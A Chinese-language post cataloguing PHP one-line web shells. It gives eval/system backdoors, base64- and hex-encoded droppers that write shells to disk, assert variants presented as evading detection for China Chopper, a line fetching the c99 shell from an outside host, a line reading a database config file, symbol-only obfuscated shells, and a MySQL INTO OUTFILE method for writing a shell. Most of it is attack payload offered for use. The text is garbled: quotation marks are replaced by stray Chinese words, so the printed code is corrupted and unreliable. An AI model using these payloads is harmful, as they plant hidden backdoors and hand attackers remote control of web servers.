一、根本类的一句话--功能仅限于验证漏洞了,实际中非常随意马虎被查出出来:
<?php @eval($_GET[\"大众code\"大众])?><?php @system($_POST[\"大众cmd\"大众])?>
二、编码的更换的类型:
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>//会天生<?php @eval($_POST['lostwolf']);?><script language=\"大众php\"大众>@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>//php在html内部的一种嵌入办法<?php fputs (fopen(pack(\公众H\"大众,\"大众6c6f7374776f6c662e706870\"大众),\"大众w\"大众),pack(\公众H\"大众,\"大众3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e\"大众))?><?phpsession_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>
三、其他类型:
<?php $_GET[a]($_GET[b]);?>//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};<?php assert($_REQUEST[\"大众pass\"大众]);?> //菜刀连接 躲避检测 密码pass <?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
<?php echo copy(\公众http://www.r57.me/c99.txt\"大众,\公众lostwolf.php\"大众); ?> <? echo file_get_contents(\"大众..//cfg_database.php\"大众);?> //显示某文件<? eval ( file_get_contents(\"大众远程shell\"大众)) ?> //运行远程shell
五、无关键函数类型:
<?php$_=\公众\"大众;$_[+\"大众\"大众]='';$_=\"大众$_\"大众.\"大众\"大众;$_=($_[+\"大众\"大众]|\"大众\公众).($_[+\公众\公众]|\"大众\"大众).($_[+\"大众\公众]^\"大众\公众);?><?php ${'_'.$_}['_'](${'_'.$_}['__']);?>http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass<?$_=\"大众\公众;$_[+\"大众\"大众]='_';$_=\公众$_\公众.\"大众\公众;$_=($_[+\"大众\"大众]|\"大众\公众).($_[+\公众\公众]|\公众\"大众).($_[+\"大众\"大众]^\"大众\公众);?>
六、补充知识点:
SQL写一句话(MySQL):
select \"大众<?php @system($_POST[\公众pass\"大众]);?>\"大众 into outfile \"大众/home/webaccount/projectname/www/.php\公众
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以!
以上便是PHP一句话木马小结与SQL语句写一句话木马的详细内容,更多请关注其它干系文章!
更多技巧请《转发 + 关注》哦!